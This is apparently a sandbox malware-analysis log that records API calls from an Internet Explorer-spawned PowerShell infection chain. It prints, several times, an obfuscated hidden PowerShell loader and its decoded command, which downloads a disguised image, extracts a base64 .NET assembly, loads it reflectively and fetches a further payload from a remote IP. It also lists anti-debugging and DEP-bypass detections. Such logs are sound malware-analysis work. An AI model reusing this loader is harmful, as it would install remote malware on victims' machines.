k€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€Ow€€k€€GE€€cgBn€€HU€€bQBl€€G4€€d€€Bz€€C€€€€PQ€€g€€Cw€€K€€€€n€€HQ€€e€€B0€€C4€€Z€€Bt€€GM€€awBo€€C8€€QgBJ€€C8€€Mg€€y€€DE€€Lg€€5€€DM€€Mg€€u€€DQ€€OQ€€u€€DM€€Mg€€v€€C8€€OgBw€€HQ€€d€€Bo€€Cc€€KQ€€7€€CQ€€bQBl€€HQ€€a€€Bv€€GQ€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€J€€Bh€€HI€€ZwB1€€G0€€ZQBu€€HQ€€cw€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000000000004cc
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€dQBw€€Gw€€bwBh€€GQ€€Z€€Bl€€Gk€€bQBh€€Gc€€ZQBu€€HM€€LgBj€€G8€€bQ€€u€€GI€€cg€€v€€Gk€€bQBh€€Gc€€ZQBz€€C8€€M€€€€w€€DQ€€Lw€€1€€Dg€€Mw€€v€€DQ€€MQ€€x€€C8€€bwBy€€Gk€€ZwBp€€G4€€YQBs€€C8€€a€€B0€€GE€€LgBq€€H€€€€Zw€€/€€DE€€Ng€€5€€DI€€Ng€€1€€Dg€€Mg€€y€€Dk€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€Ow€€k€€GE€€cgBn€€HU€€bQBl€€G4€€d€€Bz€€C€€€€PQ€€g€€Cw€€K€€€€n€€HQ€€e€€B0€€C4€€Z€€Bt€€GM€€awBo€€C8€€QgBJ€€C8€€Mg€€y€€DE€€Lg€€5€€DM€€Mg€€u€€DQ€€OQ€€u€€DM€€Mg€€v€€C8€€OgBw€€HQ€€d€€Bo€€Cc€€KQ€€7€€CQ€€bQBl€€HQ€€a€€Bv€€GQ€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€J€€Bh€€HI€€ZwB1€€G0€€ZQBu€€HQ€€cw€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
filepath: powershell
1 1 0

CreateProcessInternalW

 thread_identifier: 2780
thread_handle: 0x000000000000033c
process_identifier: 2776
current_directory: C:\Users\test22\Desktop
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/583/411/original/hta.jpg?1692658229';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.dmckh/BI/221.932.49.32//:ptth');$method.Invoke($null, $arguments)"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000000000003c0
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x000007fffff80000
process_handle: 0xffffffffffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received [
Data received Weߞ ?I^d*ú]#걒Ûð”DOWNGRD •¿| [Çý„v}‡‰ |2»62¿«‘è73EÀ̝®¤À ÿ 
Data received P
Data received ‘
Data received ALŸÆUú¨eL ÂÓڕ´¥SXÛ.þ2‰…_fã)#ÔV‹j‚W›54°Ø‡£1B½ïnn‰°š´}þû sѬF0D X ž°,çÛ¤Ã:ÿQ.2.©Í؜+Mœ¢áD(>Ÿ ‡”rýû¯ £Èå~b`!­ÀÝþñƒRzfy¿Ñ Ê̸
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received Œqò_–âåº\‚ÐtuŒïÝÌ&ã›Võ{ô™ 1XsÀ= Páè^ÝvZ
Data sent yue×%Ð53Ó#.‹Ø⥨ÅÚ¼(¬ ѲY•¢ÙÔ/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
Data sent FBAÝô2“çä:v×//ª×LUª}Ոä/7ÿËƵ€QãÑÍ»m¿èë;– ä1 £hÒż#=®1Òûg´8W0ïoôÐû ´+L“0ó!¾ö ‰SQ@ܖžËO'íÿ7Tg4»›eÃ!I¨Q§
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1960 CREDAT:145409
host 117.18.232.200
parent_process iexplore.exe martian_process powershell -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€dQBw€€Gw€€bwBh€€GQ€€Z€€Bl€€Gk€€bQBh€€Gc€€ZQBu€€HM€€LgBj€€G8€€bQ€€u€€GI€€cg€€v€€Gk€€bQBh€€Gc€€ZQBz€€C8€€M€€€€w€€DQ€€Lw€€1€€Dg€€Mw€€v€€DQ€€MQ€€x€€C8€€bwBy€€Gk€€ZwBp€€G4€€YQBs€€C8€€a€€B0€€GE€€LgBq€€H€€€€Zw€€/€€DE€€Ng€€5€€DI€€Ng€€1€€Dg€€Mg€€y€€Dk€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€Ow€€k€€GE€€cgBn€€HU€€bQBl€€G4€€d€€Bz€€C€€€€PQ€€g€€Cw€€K€€€€n€€HQ€€e€€B0€€C4€€Z€€Bt€€GM€€awBo€€C8€€QgBJ€€C8€€Mg€€y€€DE€€Lg€€5€€DM€€Mg€€u€€DQ€€OQ€€u€€DM€€Mg€€v€€C8€€OgBw€€HQ€€d€€Bo€€Cc€€KQ€€7€€CQ€€bQBl€€HQ€€a€€Bv€€GQ€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€J€€Bh€€HI€€ZwB1€€G0€€ZQBu€€HQ€€cw€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
Time & API Arguments Status Return Repeated

send

 buffer: yue×%Ð53Ó#.‹Ø⥨ÅÚ¼(¬ ѲY•¢ÙÔ/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
socket: 1284
sent: 126
1 126 0

send

 buffer: FBAÝô2“çä:v×//ª×LUª}Ոä/7ÿËƵ€QãÑÍ»m¿èë;– ä1 £hÒż#=®1Òûg´8W0ïoôÐû ´+L“0ó!¾ö ‰SQ@ܖžËO'íÿ7Tg4»›eÃ!I¨Q§
socket: 1284
sent: 134
1 134 0

WSASend

 buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 1868
0 0
parent_process iexplore.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€dQBw€€Gw€€bwBh€€GQ€€Z€€Bl€€Gk€€bQBh€€Gc€€ZQBu€€HM€€LgBj€€G8€€bQ€€u€€GI€€cg€€v€€Gk€€bQBh€€Gc€€ZQBz€€C8€€M€€€€w€€DQ€€Lw€€1€€Dg€€Mw€€v€€DQ€€MQ€€x€€C8€€bwBy€€Gk€€ZwBp€€G4€€YQBs€€C8€€a€€B0€€GE€€LgBq€€H€€€€Zw€€/€€DE€€Ng€€5€€DI€€Ng€€1€€Dg€€Mg€€y€€Dk€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€Ow€€k€€GE€€cgBn€€HU€€bQBl€€G4€€d€€Bz€€C€€€€PQ€€g€€Cw€€K€€€€n€€HQ€€e€€B0€€C4€€Z€€Bt€€GM€€awBo€€C8€€QgBJ€€C8€€Mg€€y€€DE€€Lg€€5€€DM€€Mg€€u€€DQ€€OQ€€u€€DM€€Mg€€v€€C8€€OgBw€€HQ€€d€€Bo€€Cc€€KQ€€7€€CQ€€bQBl€€HQ€€a€€Bv€€GQ€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€J€€Bh€€HI€€ZwB1€€G0€€ZQBu€€HQ€€cw€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
parent_process iexplore.exe martian_process powershell -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€dQBw€€Gw€€bwBh€€GQ€€Z€€Bl€€Gk€€bQBh€€Gc€€ZQBu€€HM€€LgBj€€G8€€bQ€€u€€GI€€cg€€v€€Gk€€bQBh€€Gc€€ZQBz€€C8€€M€€€€w€€DQ€€Lw€€1€€Dg€€Mw€€v€€DQ€€MQ€€x€€C8€€bwBy€€Gk€€ZwBp€€G4€€YQBs€€C8€€a€€B0€€GE€€LgBq€€H€€€€Zw€€/€€DE€€Ng€€5€€DI€€Ng€€1€€Dg€€Mg€€y€€Dk€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€B